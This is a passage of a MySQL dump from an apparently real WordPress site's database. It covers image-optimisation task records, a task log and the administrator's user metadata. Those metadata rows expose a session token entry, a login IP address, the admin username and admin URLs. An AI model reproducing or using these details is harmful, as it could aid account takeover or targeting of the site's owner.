d_file_types\";s:77:\"a:5:{i:0;s:3:\"gif\";i:1;s:3:\"png\";i:2;s:3:\"jpg\";i:3;s:3:\"tif\";i:4;s:4:\"jpeg\";}\";s:15:\"request_timeout\";i:30;s:13:\"keep_original\";s:1:\"1\";s:13:\"preserve_exif\";b:1;s:13:\"image_quality\";s:2:\"95\";s:12:\"api_endpoint\";s:22:\"http://api.resmush.it/\";s:12:\"max_filesize\";i:5242880;s:7:\"version\";s:6:\"0.1.13\";s:13:\"backup_prefix\";s:28:\"-updraft-pre-smush-original.\";s:13:\"attachment_id\";i:398;s:7:\"blog_id\";i:1;s:17:\"lossy_compression\";s:1:\"1\";s:13:\"current_stage\";s:9:\"completed\";s:17:\"original_filesize\";i:677445;}'),(24,24,'task_options','a:14:{s:18:\"allowed_file_types\";s:77:\"a:5:{i:0;s:3:\"gif\";i:1;s:3:\"png\";i:2;s:3:\"jpg\";i:3;s:3:\"tif\";i:4;s:4:\"jpeg\";}\";s:15:\"request_timeout\";i:30;s:13:\"keep_original\";s:1:\"1\";s:13:\"preserve_exif\";b:1;s:13:\"image_quality\";s:2:\"95\";s:12:\"api_endpoint\";s:22:\"http://api.resmush.it/\";s:12:\"max_filesize\";i:5242880;s:7:\"version\";s:6:\"0.1.13\";s:13:\"backup_prefix\";s:28:\"-updraft-pre-smush-original.\";s:13:\"attachment_id\";i:391;s:7:\"blog_id\";i:1;s:17:\"lossy_compression\";s:1:\"1\";s:13:\"current_stage\";s:9:\"completed\";s:17:\"original_filesize\";i:1378193;}'),(25,25,'task_options','a:14:{s:18:\"allowed_file_types\";s:77:\"a:5:{i:0;s:3:\"gif\";i:1;s:3:\"png\";i:2;s:3:\"jpg\";i:3;s:3:\"tif\";i:4;s:4:\"jpeg\";}\";s:15:\"request_timeout\";i:30;s:13:\"keep_original\";s:1:\"1\";s:13:\"preserve_exif\";b:1;s:13:\"image_quality\";s:2:\"95\";s:12:\"api_endpoint\";s:22:\"http://api.resmush.it/\";s:12:\"max_filesize\";i:5242880;s:7:\"version\";s:6:\"0.1.13\";s:13:\"backup_prefix\";s:28:\"-updraft-pre-smush-original.\";s:13:\"attachment_id\";i:380;s:7:\"blog_id\";i:1;s:17:\"lossy_compression\";s:1:\"1\";s:13:\"current_stage\";s:9:\"completed\";s:17:\"original_filesize\";i:2458588;}'),(26,26,'task_options','a:14:{s:18:\"allowed_file_types\";s:77:\"a:5:{i:0;s:3:\"gif\";i:1;s:3:\"png\";i:2;s:3:\"jpg\";i:3;s:3:\"tif\";i:4;s:4:\"jpeg\";}\";s:15:\"request_timeout\";i:30;s:13:\"keep_original\";s:1:\"1\";s:13:\"preserve_exif\";b:1;s:13:\"image_quality\";s:2:\"95\";s:12:\"api_endpoint\";s:22:\"http://api.resmush.it/\";s:12:\"max_filesize\";i:5242880;s:7:\"version\";s:6:\"0.1.13\";s:13:\"backup_prefix\";s:28:\"-updraft-pre-smush-original.\";s:13:\"attachment_id\";i:364;s:7:\"blog_id\";i:1;s:17:\"lossy_compression\";s:1:\"1\";s:13:\"current_stage\";s:9:\"completed\";s:17:\"original_filesize\";i:916378;}'),(27,27,'task_options','a:14:{s:18:\"allowed_file_types\";s:77:\"a:5:{i:0;s:3:\"gif\";i:1;s:3:\"png\";i:2;s:3:\"jpg\";i:3;s:3:\"tif\";i:4;s:4:\"jpeg\";}\";s:15:\"request_timeout\";i:30;s:13:\"keep_original\";s:1:\"1\";s:13:\"preserve_exif\";b:1;s:13:\"image_quality\";s:2:\"95\";s:12:\"api_endpoint\";s:22:\"http://api.resmush.it/\";s:12:\"max_filesize\";i:5242880;s:7:\"version\";s:6:\"0.1.13\";s:13:\"backup_prefix\";s:28:\"-updraft-pre-smush-original.\";s:13:\"attachment_id\";i:356;s:7:\"blog_id\";i:1;s:17:\"lossy_compression\";s:1:\"1\";s:13:\"current_stage\";s:9:\"completed\";s:17:\"original_filesize\";i:1067528;}'),(28,28,'task_options','a:14:{s:18:\"allowed_file_types\";s:77:\"a:5:{i:0;s:3:\"gif\";i:1;s:3:\"png\";i:2;s:3:\"jpg\";i:3;s:3:\"tif\";i:4;s:4:\"jpeg\";}\";s:15:\"request_timeout\";i:30;s:13:\"keep_original\";s:1:\"1\";s:13:\"preserve_exif\";b:1;s:13:\"image_quality\";s:2:\"95\";s:12:\"api_endpoint\";s:22:\"http://api.resmush.it/\";s:12:\"max_filesize\";i:5242880;s:7:\"version\";s:6:\"0.1.13\";s:13:\"backup_prefix\";s:28:\"-updraft-pre-smush-original.\";s:13:\"attachment_id\";i:347;s:7:\"blog_id\";i:1;s:17:\"lossy_compression\";s:1:\"1\";s:13:\"current_stage\";s:9:\"completed\";s:17:\"original_filesize\";i:1542942;}'),(29,29,'task_options','a:14:{s:18:\"allowed_file_types\";s:77:\"a:5:{i:0;s:3:\"gif\";i:1;s:3:\"png\";i:2;s:3:\"jpg\";i:3;s:3:\"tif\";i:4;s:4:\"jpeg\";}\";s:15:\"request_timeout\";i:30;s:13:\"keep_original\";s:1:\"1\";s:13:\"preserve_exif\";b:1;s:13:\"image_quality\";s:2:\"95\";s:12:\"api_endpoint\";s:22:\"http://api.resmush.it/\";s:12:\"max_filesize\";i:5242880;s:7:\"version\";s:6:\"0.1.13\";s:13:\"backup_prefix\";s:28:\"-updraft-pre-smush-original.\";s:13:\"attachment_id\";i:338;s:7:\"blog_id\";i:1;s:17:\"lossy_compression\";s:1:\"1\";s:13:\"current_stage\";s:9:\"completed\";s:17:\"original_filesize\";i:1496180;}'),(30,30,'task_options','a:14:{s:18:\"allowed_file_types\";s:77:\"a:5:{i:0;s:3:\"gif\";i:1;s:3:\"png\";i:2;s:3:\"jpg\";i:3;s:3:\"tif\";i:4;s:4:\"jpeg\";}\";s:15:\"request_timeout\";i:30;s:13:\"keep_original\";s:1:\"1\";s:13:\"preserve_exif\";b:1;s:13:\"image_quality\";s:2:\"95\";s:12:\"api_endpoint\";s:22:\"http://api.resmush.it/\";s:12:\"max_filesize\";i:5242880;s:7:\"version\";s:6:\"0.1.13\";s:13:\"backup_prefix\";s:28:\"-updraft-pre-smush-original.\";s:13:\"attachment_id\";i:325;s:7:\"blog_id\";i:1;s:17:\"lossy_compression\";s:1:\"1\";s:13:\"current_stage\";s:9:\"completed\";s:17:\"original_filesize\";i:1542802;}'),(31,31,'task_options','a:14:{s:18:\"allowed_file_types\";s:77:\"a:5:{i:0;s:3:\"gif\";i:1;s:3:\"png\";i:2;s:3:\"jpg\";i:3;s:3:\"tif\";i:4;s:4:\"jpeg\";}\";s:15:\"request_timeout\";i:30;s:13:\"keep_original\";s:1:\"1\";s:13:\"preserve_exif\";b:1;s:13:\"image_quality\";s:2:\"95\";s:12:\"api_endpoint\";s:22:\"http://api.resmush.it/\";s:12:\"max_filesize\";i:5242880;s:7:\"version\";s:6:\"0.1.13\";s:13:\"backup_prefix\";s:28:\"-updraft-pre-smush-original.\";s:13:\"attachment_id\";i:313;s:7:\"blog_id\";i:1;s:17:\"lossy_compression\";s:1:\"1\";s:13:\"current_stage\";s:9:\"completed\";s:17:\"original_filesize\";i:694534;}'),(32,32,'task_options','a:14:{s:18:\"allowed_file_types\";s:77:\"a:5:{i:0;s:3:\"gif\";i:1;s:3:\"png\";i:2;s:3:\"jpg\";i:3;s:3:\"tif\";i:4;s:4:\"jpeg\";}\";s:15:\"request_timeout\";i:30;s:13:\"keep_original\";s:1:\"1\";s:13:\"preserve_exif\";b:1;s:13:\"image_quality\";s:2:\"95\";s:12:\"api_endpoint\";s:22:\"http://api.resmush.it/\";s:12:\"max_filesize\";i:5242880;s:7:\"version\";s:6:\"0.1.13\";s:13:\"backup_prefix\";s:28:\"-updraft-pre-smush-original.\";s:13:\"attachment_id\";i:307;s:7:\"blog_id\";i:1;s:17:\"lossy_compression\";s:1:\"1\";s:13:\"current_stage\";s:9:\"completed\";s:17:\"original_filesize\";i:1921141;}'),(33,33,'task_options','a:14:{s:18:\"allowed_file_types\";s:77:\"a:5:{i:0;s:3:\"gif\";i:1;s:3:\"png\";i:2;s:3:\"jpg\";i:3;s:3:\"tif\";i:4;s:4:\"jpeg\";}\";s:15:\"request_timeout\";i:30;s:13:\"keep_original\";s:1:\"1\";s:13:\"preserve_exif\";b:1;s:13:\"image_quality\";s:2:\"95\";s:12:\"api_endpoint\";s:22:\"http://api.resmush.it/\";s:12:\"max_filesize\";i:5242880;s:7:\"version\";s:6:\"0.1.13\";s:13:\"backup_prefix\";s:28:\"-updraft-pre-smush-original.\";s:13:\"attachment_id\";i:302;s:7:\"blog_id\";i:1;s:17:\"lossy_compression\";s:1:\"1\";s:13:\"current_stage\";s:9:\"completed\";s:17:\"original_filesize\";i:2293795;}'),(34,34,'task_options','a:14:{s:18:\"allowed_file_types\";s:77:\"a:5:{i:0;s:3:\"gif\";i:1;s:3:\"png\";i:2;s:3:\"jpg\";i:3;s:3:\"tif\";i:4;s:4:\"jpeg\";}\";s:15:\"request_timeout\";i:30;s:13:\"keep_original\";s:1:\"1\";s:13:\"preserve_exif\";b:1;s:13:\"image_quality\";s:2:\"95\";s:12:\"api_endpoint\";s:22:\"http://api.resmush.it/\";s:12:\"max_filesize\";i:5242880;s:7:\"version\";s:6:\"0.1.13\";s:13:\"backup_prefix\";s:28:\"-updraft-pre-smush-original.\";s:13:\"attachment_id\";i:301;s:7:\"blog_id\";i:1;s:17:\"lossy_compression\";s:1:\"1\";s:13:\"current_stage\";s:9:\"completed\";s:17:\"original_filesize\";i:1460063;}'),(35,35,'task_options','a:14:{s:18:\"allowed_file_types\";s:77:\"a:5:{i:0;s:3:\"gif\";i:1;s:3:\"png\";i:2;s:3:\"jpg\";i:3;s:3:\"tif\";i:4;s:4:\"jpeg\";}\";s:15:\"request_timeout\";i:30;s:13:\"keep_original\";s:1:\"1\";s:13:\"preserve_exif\";b:1;s:13:\"image_quality\";s:2:\"95\";s:12:\"api_endpoint\";s:22:\"http://api.resmush.it/\";s:12:\"max_filesize\";i:5242880;s:7:\"version\";s:6:\"0.1.13\";s:13:\"backup_prefix\";s:28:\"-updraft-pre-smush-original.\";s:13:\"attachment_id\";i:300;s:7:\"blog_id\";i:1;s:17:\"lossy_compression\";s:1:\"1\";s:13:\"current_stage\";s:9:\"completed\";s:17:\"original_filesize\";i:1470670;}'),(36,36,'task_options','a:14:{s:18:\"allowed_file_types\";s:77:\"a:5:{i:0;s:3:\"gif\";i:1;s:3:\"png\";i:2;s:3:\"jpg\";i:3;s:3:\"tif\";i:4;s:4:\"jpeg\";}\";s:15:\"request_timeout\";i:30;s:13:\"keep_original\";s:1:\"1\";s:13:\"preserve_exif\";b:1;s:13:\"image_quality\";s:2:\"95\";s:12:\"api_endpoint\";s:22:\"http://api.resmush.it/\";s:12:\"max_filesize\";i:5242880;s:7:\"version\";s:6:\"0.1.13\";s:13:\"backup_prefix\";s:28:\"-updraft-pre-smush-original.\";s:13:\"attachment_id\";i:299;s:7:\"blog_id\";i:1;s:17:\"lossy_compression\";s:1:\"1\";s:13:\"current_stage\";s:9:\"completed\";s:17:\"original_filesize\";i:1755585;}'),(37,37,'task_options','a:14:{s:18:\"allowed_file_types\";s:77:\"a:5:{i:0;s:3:\"gif\";i:1;s:3:\"png\";i:2;s:3:\"jpg\";i:3;s:3:\"tif\";i:4;s:4:\"jpeg\";}\";s:15:\"request_timeout\";i:30;s:13:\"keep_original\";s:1:\"1\";s:13:\"preserve_exif\";b:1;s:13:\"image_quality\";s:2:\"95\";s:12:\"api_endpoint\";s:22:\"http://api.resmush.it/\";s:12:\"max_filesize\";i:5242880;s:7:\"version\";s:6:\"0.1.13\";s:13:\"backup_prefix\";s:28:\"-updraft-pre-smush-original.\";s:13:\"attachment_id\";i:298;s:7:\"blog_id\";i:1;s:17:\"lossy_compression\";s:1:\"1\";s:13:\"current_stage\";s:9:\"completed\";s:17:\"original_filesize\";i:2477151;}'),(38,38,'task_options','a:14:{s:18:\"allowed_file_types\";s:77:\"a:5:{i:0;s:3:\"gif\";i:1;s:3:\"png\";i:2;s:3:\"jpg\";i:3;s:3:\"tif\";i:4;s:4:\"jpeg\";}\";s:15:\"request_timeout\";i:30;s:13:\"keep_original\";s:1:\"1\";s:13:\"preserve_exif\";b:1;s:13:\"image_quality\";s:2:\"95\";s:12:\"api_endpoint\";s:22:\"http://api.resmush.it/\";s:12:\"max_filesize\";i:5242880;s:7:\"version\";s:6:\"0.1.13\";s:13:\"backup_prefix\";s:28:\"-updraft-pre-smush-original.\";s:13:\"attachment_id\";i:293;s:7:\"blog_id\";i:1;s:17:\"lossy_compression\";s:1:\"1\";s:13:\"current_stage\";s:9:\"completed\";s:17:\"original_filesize\";i:1628272;}'),(39,39,'task_options','a:14:{s:18:\"allowed_file_types\";s:77:\"a:5:{i:0;s:3:\"gif\";i:1;s:3:\"png\";i:2;s:3:\"jpg\";i:3;s:3:\"tif\";i:4;s:4:\"jpeg\";}\";s:15:\"request_timeout\";i:30;s:13:\"keep_original\";s:1:\"1\";s:13:\"preserve_exif\";b:1;s:13:\"image_quality\";s:2:\"95\";s:12:\"api_endpoint\";s:22:\"http://api.resmush.it/\";s:12:\"max_filesize\";i:5242880;s:7:\"version\";s:6:\"0.1.13\";s:13:\"backup_prefix\";s:28:\"-updraft-pre-smush-original.\";s:13:\"attachment_id\";i:283;s:7:\"blog_id\";i:1;s:17:\"lossy_compression\";s:1:\"1\";s:13:\"current_stage\";s:9:\"completed\";s:17:\"original_filesize\";i:1803620;}'),(40,40,'task_options','a:14:{s:18:\"allowed_file_types\";s:77:\"a:5:{i:0;s:3:\"gif\";i:1;s:3:\"png\";i:2;s:3:\"jpg\";i:3;s:3:\"tif\";i:4;s:4:\"jpeg\";}\";s:15:\"request_timeout\";i:30;s:13:\"keep_original\";s:1:\"1\";s:13:\"preserve_exif\";b:1;s:13:\"image_quality\";s:2:\"95\";s:12:\"api_endpoint\";s:22:\"http://api.resmush.it/\";s:12:\"max_filesize\";i:5242880;s:7:\"version\";s:6:\"0.1.13\";s:13:\"backup_prefix\";s:28:\"-updraft-pre-smush-original.\";s:13:\"attachment_id\";i:268;s:7:\"blog_id\";i:1;s:17:\"lossy_compression\";s:1:\"1\";s:13:\"current_stage\";s:9:\"completed\";s:17:\"original_filesize\";i:2619955;}'),(86,86,'task_options','a:14:{s:18:\"allowed_file_types\";s:77:\"a:5:{i:0;s:3:\"gif\";i:1;s:3:\"png\";i:2;s:3:\"jpg\";i:3;s:3:\"tif\";i:4;s:4:\"jpeg\";}\";s:15:\"request_timeout\";i:30;s:13:\"keep_original\";b:1;s:13:\"preserve_exif\";b:0;s:13:\"image_quality\";s:2:\"95\";s:12:\"api_endpoint\";s:22:\"http://api.resmush.it/\";s:12:\"max_filesize\";i:5242880;s:7:\"version\";s:6:\"0.1.13\";s:13:\"backup_prefix\";s:28:\"-updraft-pre-smush-original.\";s:13:\"attachment_id\";s:2:\"22\";s:7:\"blog_id\";s:1:\"1\";s:17:\"lossy_compression\";b:1;s:13:\"current_stage\";s:9:\"completed\";s:17:\"original_filesize\";i:69903;}'),(87,87,'task_options','a:14:{s:18:\"allowed_file_types\";s:77:\"a:5:{i:0;s:3:\"gif\";i:1;s:3:\"png\";i:2;s:3:\"jpg\";i:3;s:3:\"tif\";i:4;s:4:\"jpeg\";}\";s:15:\"request_timeout\";i:30;s:13:\"keep_original\";b:1;s:13:\"preserve_exif\";b:0;s:13:\"image_quality\";s:2:\"95\";s:12:\"api_endpoint\";s:22:\"http://api.resmush.it/\";s:12:\"max_filesize\";i:5242880;s:7:\"version\";s:6:\"0.1.13\";s:13:\"backup_prefix\";s:28:\"-updraft-pre-smush-original.\";s:13:\"attachment_id\";s:2:\"71\";s:7:\"blog_id\";s:1:\"1\";s:17:\"lossy_compression\";b:1;s:13:\"current_stage\";s:9:\"completed\";s:17:\"original_filesize\";i:1289524;}'),(88,41,'task_options','a:3:{s:13:\"current_stage\";s:9:\"completed\";s:10:\"error_code\";s:19:\"http_request_failed\";s:13:\"error_message\";s:17:\"fsocket timed out\";}');
/*!40000 ALTER TABLE `wp_tm_taskmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_tm_tasks`
--

DROP TABLE IF EXISTS `wp_tm_tasks`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_tm_tasks` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) NOT NULL,
  `type` varchar(300) NOT NULL,
  `class_identifier` varchar(300) DEFAULT '0',
  `attempts` int(11) DEFAULT 0,
  `description` varchar(300) DEFAULT NULL,
  `time_created` timestamp NOT NULL DEFAULT current_timestamp(),
  `last_locked_at` bigint(20) DEFAULT 0,
  `status` varchar(300) DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `user_id` (`user_id`)
) ENGINE=InnoDB AUTO_INCREMENT=88 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_tm_tasks`
--

LOCK TABLES `wp_tm_tasks` WRITE;
/*!40000 ALTER TABLE `wp_tm_tasks` DISABLE KEYS */;
INSERT INTO `wp_tm_tasks` VALUES (1,1,'smush','Re_Smush_It_Task',1,'Re_Smush_It_Task - Attachment ID : 646, Started on : October 09, 2020 11:58:52','2020-10-09 11:58:52',0,'complete'),(2,1,'smush','Re_Smush_It_Task',1,'Re_Smush_It_Task - Attachment ID : 645, Started on : October 09, 2020 11:58:52','2020-10-09 11:58:52',0,'complete'),(3,1,'smush','Re_Smush_It_Task',1,'Re_Smush_It_Task - Attachment ID : 633, Started on : October 09, 2020 11:58:53','2020-10-09 11:58:53',0,'complete'),(4,1,'smush','Re_Smush_It_Task',1,'Re_Smush_It_Task - Attachment ID : 628, Started on : October 09, 2020 11:58:54','2020-10-09 11:58:54',0,'complete'),(5,1,'smush','Re_Smush_It_Task',1,'Re_Smush_It_Task - Attachment ID : 622, Started on : October 09, 2020 11:58:55','2020-10-09 11:58:55',0,'complete'),(6,1,'smush','Re_Smush_It_Task',1,'Re_Smush_It_Task - Attachment ID : 621, Started on : October 09, 2020 11:58:55','2020-10-09 11:58:55',0,'complete'),(7,1,'smush','Re_Smush_It_Task',1,'Re_Smush_It_Task - Attachment ID : 615, Started on : October 09, 2020 11:58:56','2020-10-09 11:58:56',0,'complete'),(8,1,'smush','Re_Smush_It_Task',1,'Re_Smush_It_Task - Attachment ID : 614, Started on : October 09, 2020 11:58:56','2020-10-09 11:58:56',0,'complete'),(9,1,'smush','Re_Smush_It_Task',1,'Re_Smush_It_Task - Attachment ID : 608, Started on : October 09, 2020 11:58:56','2020-10-09 11:58:56',0,'complete'),(10,1,'smush','Re_Smush_It_Task',1,'Re_Smush_It_Task - Attachment ID : 601, Started on : October 09, 2020 11:58:57','2020-10-09 11:58:57',0,'complete'),(11,1,'smush','Re_Smush_It_Task',1,'Re_Smush_It_Task - Attachment ID : 596, Started on : October 09, 2020 11:58:58','2020-10-09 11:58:58',0,'complete'),(12,1,'smush','Re_Smush_It_Task',1,'Re_Smush_It_Task - Attachment ID : 581, Started on : October 09, 2020 11:58:59','2020-10-09 11:58:59',0,'complete'),(13,1,'smush','Re_Smush_It_Task',1,'Re_Smush_It_Task - Attachment ID : 580, Started on : October 09, 2020 11:59:00','2020-10-09 11:59:00',0,'complete'),(14,1,'smush','Re_Smush_It_Task',1,'Re_Smush_It_Task - Attachment ID : 485, Started on : October 09, 2020 11:59:00','2020-10-09 11:59:00',0,'complete'),(15,1,'smush','Re_Smush_It_Task',1,'Re_Smush_It_Task - Attachment ID : 472, Started on : October 09, 2020 11:59:01','2020-10-09 11:59:01',0,'complete'),(16,1,'smush','Re_Smush_It_Task',1,'Re_Smush_It_Task - Attachment ID : 469, Started on : October 09, 2020 11:59:02','2020-10-09 11:59:02',0,'complete'),(17,1,'smush','Re_Smush_It_Task',1,'Re_Smush_It_Task - Attachment ID : 464, Started on : October 09, 2020 11:59:03','2020-10-09 11:59:03',0,'complete'),(18,1,'smush','Re_Smush_It_Task',1,'Re_Smush_It_Task - Attachment ID : 452, Started on : October 09, 2020 11:59:03','2020-10-09 11:59:03',0,'complete'),(19,1,'smush','Re_Smush_It_Task',1,'Re_Smush_It_Task - Attachment ID : 445, Started on : October 09, 2020 11:59:04','2020-10-09 11:59:04',0,'complete'),(20,1,'smush','Re_Smush_It_Task',1,'Re_Smush_It_Task - Attachment ID : 424, Started on : October 09, 2020 11:59:04','2020-10-09 11:59:04',0,'complete'),(21,1,'smush','Re_Smush_It_Task',1,'Re_Smush_It_Task - Attachment ID : 417, Started on : October 09, 2020 11:59:06','2020-10-09 11:59:06',0,'complete'),(22,1,'smush','Re_Smush_It_Task',1,'Re_Smush_It_Task - Attachment ID : 405, Started on : October 09, 2020 11:59:07','2020-10-09 11:59:07',0,'complete'),(23,1,'smush','Re_Smush_It_Task',1,'Re_Smush_It_Task - Attachment ID : 398, Started on : October 09, 2020 11:59:08','2020-10-09 11:59:08',0,'complete'),(24,1,'smush','Re_Smush_It_Task',1,'Re_Smush_It_Task - Attachment ID : 391, Started on : October 09, 2020 11:59:09','2020-10-09 11:59:09',0,'complete'),(25,1,'smush','Re_Smush_It_Task',1,'Re_Smush_It_Task - Attachment ID : 380, Started on : October 09, 2020 11:59:10','2020-10-09 11:59:10',0,'complete'),(26,1,'smush','Re_Smush_It_Task',1,'Re_Smush_It_Task - Attachment ID : 364, Started on : October 09, 2020 11:59:11','2020-10-09 11:59:11',0,'complete'),(27,1,'smush','Re_Smush_It_Task',1,'Re_Smush_It_Task - Attachment ID : 356, Started on : October 09, 2020 11:59:12','2020-10-09 11:59:12',0,'complete'),(28,1,'smush','Re_Smush_It_Task',1,'Re_Smush_It_Task - Attachment ID : 347, Started on : October 09, 2020 11:59:14','2020-10-09 11:59:14',0,'complete'),(29,1,'smush','Re_Smush_It_Task',1,'Re_Smush_It_Task - Attachment ID : 338, Started on : October 09, 2020 11:59:17','2020-10-09 11:59:17',0,'complete'),(30,1,'smush','Re_Smush_It_Task',1,'Re_Smush_It_Task - Attachment ID : 325, Started on : October 09, 2020 11:59:17','2020-10-09 11:59:17',0,'complete'),(31,1,'smush','Re_Smush_It_Task',1,'Re_Smush_It_Task - Attachment ID : 313, Started on : October 09, 2020 11:59:18','2020-10-09 11:59:18',0,'complete'),(32,1,'smush','Re_Smush_It_Task',1,'Re_Smush_It_Task - Attachment ID : 307, Started on : October 09, 2020 11:59:19','2020-10-09 11:59:19',0,'complete'),(33,1,'smush','Re_Smush_It_Task',1,'Re_Smush_It_Task - Attachment ID : 302, Started on : October 09, 2020 11:59:20','2020-10-09 11:59:20',0,'complete'),(34,1,'smush','Re_Smush_It_Task',1,'Re_Smush_It_Task - Attachment ID : 301, Started on : October 09, 2020 11:59:22','2020-10-09 11:59:22',0,'complete'),(35,1,'smush','Re_Smush_It_Task',1,'Re_Smush_It_Task - Attachment ID : 300, Started on : October 09, 2020 11:59:23','2020-10-09 11:59:23',0,'complete'),(36,1,'smush','Re_Smush_It_Task',1,'Re_Smush_It_Task - Attachment ID : 299, Started on : October 09, 2020 11:59:24','2020-10-09 11:59:24',0,'complete'),(37,1,'smush','Re_Smush_It_Task',1,'Re_Smush_It_Task - Attachment ID : 298, Started on : October 09, 2020 11:59:25','2020-10-09 11:59:25',0,'complete'),(38,1,'smush','Re_Smush_It_Task',1,'Re_Smush_It_Task - Attachment ID : 293, Started on : October 09, 2020 11:59:26','2020-10-09 11:59:26',0,'complete'),(39,1,'smush','Re_Smush_It_Task',1,'Re_Smush_It_Task - Attachment ID : 283, Started on : October 09, 2020 11:59:28','2020-10-09 11:59:28',0,'complete'),(40,1,'smush','Re_Smush_It_Task',1,'Re_Smush_It_Task - Attachment ID : 268, Started on : October 09, 2020 11:59:30','2020-10-09 11:59:30',0,'complete'),(86,1,'smush','Re_Smush_It_Task',1,'Re_Smush_It_Task - attachment ID : 22, started on : October 09, 2020 12:02:14','2020-10-09 12:02:14',0,'complete'),(87,1,'smush','Re_Smush_It_Task',1,'Re_Smush_It_Task - attachment ID : 71, started on : October 09, 2020 12:02:42','2020-10-09 12:02:42',0,'complete');
/*!40000 ALTER TABLE `wp_tm_tasks` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_usermeta`
--

DROP TABLE IF EXISTS `wp_usermeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_usermeta` (
  `umeta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`umeta_id`),
  KEY `user_id` (`user_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=40 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_usermeta`
--

LOCK TABLES `wp_usermeta` WRITE;
/*!40000 ALTER TABLE `wp_usermeta` DISABLE KEYS */;
INSERT INTO `wp_usermeta` VALUES (1,1,'nickname','westonspirit'),(2,1,'first_name',''),(3,1,'last_name',''),(4,1,'description',''),(5,1,'rich_editing','true'),(6,1,'syntax_highlighting','true'),(7,1,'comment_shortcuts','false'),(8,1,'admin_color','fresh'),(9,1,'use_ssl','0'),(10,1,'show_admin_bar_front','true'),(11,1,'locale',''),(12,1,'wp_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(13,1,'wp_user_level','10'),(14,1,'dismissed_wp_pointers','text_widget_custom_html'),(15,1,'show_welcome_panel','1'),(16,1,'session_tokens','a:1:{s:64:\"b61c616dae86bb31a6b5351bb94e6601ec4a9b910ca267723b8067ef9a839617\";a:4:{s:10:\"expiration\";i:1635611350;s:2:\"ip\";s:14:\"185.175.113.72\";s:2:\"ua\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36\";s:5:\"login\";i:1635438550;}}'),(17,1,'wp_dashboard_quick_press_last_post_id','696'),(18,1,'community-events-location','a:1:{s:2:\"ip\";s:13:\"185.175.113.0\";}'),(19,1,'wp_user-settings','editor=tinymce&libraryContent=browse&posts_list_mode=list&imgsize=large'),(20,1,'wp_user-settings-time','1539266344'),(21,1,'hive_upgrade_dismissed_notice','2'),(23,1,'edit_post_per_page','400'),(24,1,'managenav-menuscolumnshidden','a:5:{i:0;s:11:\"link-target\";i:1;s:11:\"css-classes\";i:2;s:3:\"xfn\";i:3;s:11:\"description\";i:4;s:15:\"title-attribute\";}'),(25,1,'metaboxhidden_nav-menus','a:2:{i:0;s:12:\"add-post_tag\";i:1;s:15:\"add-post_format\";}'),(26,1,'nav_menu_recently_edited','10'),(28,1,'_yoast_wpseo_profile_updated','1524205029'),(29,1,'closedpostboxes_post','a:0:{}'),(30,1,'metaboxhidden_post','a:6:{i:0;s:11:\"postexcerpt\";i:1;s:13:\"trackbacksdiv\";i:2;s:10:\"postcustom\";i:3;s:16:\"commentstatusdiv\";i:4;s:7:\"slugdiv\";i:5;s:9:\"authordiv\";}'),(31,1,'wp_yoast_notifications','a:2:{i:0;a:2:{s:7:\"message\";s:1063:\"We\'ve noticed you\'ve been using Yoast SEO for some time now; we hope you love it! We\'d be thrilled if you could <a href=\"https://yoa.st/rate-yoast-seo?php_version=7.4&platform=wordpress&platform_version=4.9.1&software=free&software_version=11.0&days_active=>30\">give us a 5-stars rating on WordPress.org</a>!\n\nIf you are experiencing issues, <a href=\"https://yoa.st/bugreport?php_version=7.4&platform=wordpress&platform_version=4.9.1&software=free&software_version=11.0&days_active=>30\">please file a bug report</a> and we\'ll do our best to help you out.\n\nBy the way, did you know we also have a <a href=\'https://yoa.st/premium-notification?php_version=7.4&platform=wordpress&platform_version=4.9.1&software=free&software_version=11.0&days_active=>30\'>Premium plugin</a>? It offers advanced features, like a redirect manager and support for multiple keyphrases. It also comes with 24/7 personal support.\n\n<a class=\"button\" href=\"http://www.westonspirit.org.uk/wp-admin/?page=wpseo_dashboard&yoast_dismiss=upsell\">Please don\'t show me this notification anymore</a>\";s:7:\"options\";a:9:{s:4:\"type\";s:7:\"warning\";s:2:\"id\";s:19:\"wpseo-upsell-notice\";s:5:\"nonce\";N;s:8:\"priority\";d:0.8;s:9:\"data_json\";a:0:{}s:13:\"dismissal_key\";N;s:12:\"capabilities\";s:20:\"wpseo_manage_options\";s:16:\"capability_check\";s:3:\"all\";s:14:\"yoast_branding\";b:0;}}i:1;a:2:{s:7:\"message\";s:173:\"Don\'t miss your crawl errors: <a href=\"http://www.westonspirit.org.uk/wp-admin/admin.php?page=wpseo_search_console&tab=settings\">connect with Google Search Console 